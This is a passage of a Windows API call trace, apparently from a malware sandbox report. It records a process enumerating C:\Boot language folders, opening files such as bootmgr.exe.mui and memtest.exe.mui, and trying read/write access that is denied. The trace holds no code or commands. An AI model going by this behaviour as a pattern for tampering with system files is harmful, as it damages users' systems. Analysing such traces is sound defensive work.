out: hHeap=0x20000) returned 1 [0070.014] AreFileApisANSI () returned 1 [0070.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fr-FR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0070.015] AreFileApisANSI () returned 1 [0070.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 30 [0070.015] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.015] GetFileType (hFile=0x41c) returned 0x1 [0070.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.015] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.016] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.016] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.016] CloseHandle (hObject=0x41c) returned 1 [0070.016] AreFileApisANSI () returned 1 [0070.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0070.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 30 [0070.016] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.016] GetLastError () returned 0x5 [0070.016] GetLastError () returned 0x5 [0070.016] SetLastError (dwErrCode=0x5) [0070.016] GetLastError () returned 0x5 [0070.016] SetLastError (dwErrCode=0x5) [0070.016] GetLastError () returned 0x5 [0070.017] SetLastError (dwErrCode=0x5) [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.017] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0070.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0070.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.018] AreFileApisANSI () returned 1 [0070.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fr-FR\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fr-FR\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.018] AreFileApisANSI () returned 1 [0070.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0070.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 30 [0070.018] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.019] GetFileType (hFile=0x41c) returned 0x1 [0070.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.019] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.019] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.019] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.019] CloseHandle (hObject=0x41c) returned 1 [0070.020] AreFileApisANSI () returned 1 [0070.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0070.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 30 [0070.020] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.020] GetLastError () returned 0x5 [0070.020] GetLastError () returned 0x5 [0070.020] SetLastError (dwErrCode=0x5) [0070.020] GetLastError () returned 0x5 [0070.020] SetLastError (dwErrCode=0x5) [0070.020] GetLastError () returned 0x5 [0070.020] SetLastError (dwErrCode=0x5) [0070.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.020] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓뎠")) returned 0 [0070.020] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0070.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0070.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0070.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0070.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0070.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.021] AreFileApisANSI () returned 1 [0070.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\hr-HR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\hr-HR", lpUsedDefaultChar=0x0) returned 14 [0070.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0070.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0070.021] AreFileApisANSI () returned 1 [0070.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0070.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\hr-HR") returned 14 [0070.022] CreateFileW (lpFileName="C:\\Boot\\hr-HR" (normalized: "c:\\boot\\hr-hr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.022] GetLastError () returned 0x5 [0070.022] GetLastError () returned 0x5 [0070.022] SetLastError (dwErrCode=0x5) [0070.022] GetLastError () returned 0x5 [0070.022] SetLastError (dwErrCode=0x5) [0070.022] GetLastError () returned 0x5 [0070.022] SetLastError (dwErrCode=0x5) [0070.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.022] AreFileApisANSI () returned 1 [0070.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88388 [0070.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88388, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\hr-HR") returned 14 [0070.022] CreateFileW (lpFileName="C:\\Boot\\hr-HR" (normalized: "c:\\boot\\hr-hr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.022] GetLastError () returned 0x5 [0070.022] GetLastError () returned 0x5 [0070.022] SetLastError (dwErrCode=0x5) [0070.022] GetLastError () returned 0x5 [0070.022] SetLastError (dwErrCode=0x5) [0070.022] GetLastError () returned 0x5 [0070.022] SetLastError (dwErrCode=0x5) [0070.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.023] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0070.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.023] FindFirstFileExW (in: lpFileName="C:\\Boot\\hr-HR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78010 [0070.023] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.023] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0070.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.024] HeapFree (in: hHeap=0x20000, 